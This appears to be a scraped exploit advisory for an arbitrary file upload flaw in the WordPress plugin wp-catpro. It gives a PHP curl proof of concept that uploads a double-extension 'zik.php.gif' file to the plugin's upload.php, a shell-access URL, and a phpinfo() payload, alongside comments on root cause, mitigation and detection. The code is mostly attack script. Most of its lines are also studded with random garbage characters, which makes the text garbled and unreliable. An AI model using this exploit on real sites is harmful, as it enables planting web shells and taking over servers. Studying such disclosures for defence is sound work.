Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
#=> Exploit
-----------
. {* h# U; `$ p* ]7 `9 X<?php
// Proof of concept against the wp-catpro upload handler
// (js/swfupload/js/upload.php), as published in this advisory.
//
// Root cause, from the plugin configuration quoted above: the extension
// allow-list ("jpg", "gif", "png") is satisfied by a double-extension name
// such as "zik.php.gif", and the destination 'folder' is taken from the
// request instead of being fixed server-side.
//
// Whether the stored .php.gif is later executed depends on the web server's
// handler configuration (e.g. an Apache setup that maps any ".php" segment
// of a multi-extension name to the PHP handler); a server that serves it as
// a plain image still accepts attacker-controlled content but does not run it.
//
// Mitigation for the handler: validate the whole filename and reject any
// extra extension, choose the stored extension server-side from the verified
// image type, ignore client-supplied paths, use a server-generated name, and
// disable script execution under wp-content/uploads.
// Detection: log POST requests to this upload.php endpoint and alert on
// uploaded names carrying more than one extension.
' v, P( f0 B$ P; n& f
, e9 {4 T6 s* n+ t8 x" |$uploadfile="zik.php.gif";) ?. K2 _* F$ p0 {: U1 v
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");9 r0 ?( F1 c6 e" A( s( O1 }* [ P
curl_setopt($ch, CURLOPT_POST, true);3 F3 u' ?* Q! Y5 Z9 u
curl_setopt($ch, CURLOPT_POSTFIELDS,% P+ v w V( O9 W& m9 B
array('Filedata'=>"@$uploadfile",+ Q Z" L K% e6 F& s1 N- G
'folder'=>'/wp-content/uploads/catpro/'));$ E- `4 n/ ~- Z/ \& |6 {
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);# v; Z6 C( }; {4 x( O
$postResult = curl_exec($ch);
; J! g; i& a4 ~7 A$ \8 jcurl_close($ch);& F7 j# n( p9 H; a3 @% x
// CURLOPT_RETURNTRANSFER makes curl_exec() return the handler's response
// body, which is printed as-is.
+ F8 Q! O: D L' N( Oprint "$postResult";
& X/ Y' f% X# m, n / \/ D, s3 C! b; s) I
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif0 b+ n6 d9 p% s* i3 ?
?>
) E2 s$ J" Y! A( j<?php6 B, j4 x, t0 [& @/ M: X
// Body of the uploaded file. phpinfo() output being served from
// wp-content/uploads confirms that the server executes scripts in the
// upload directory -- the condition that a hardened uploads directory
// (no script handler, no execute permission) removes.
phpinfo();
4 K' V$ e9 T# F& H?> |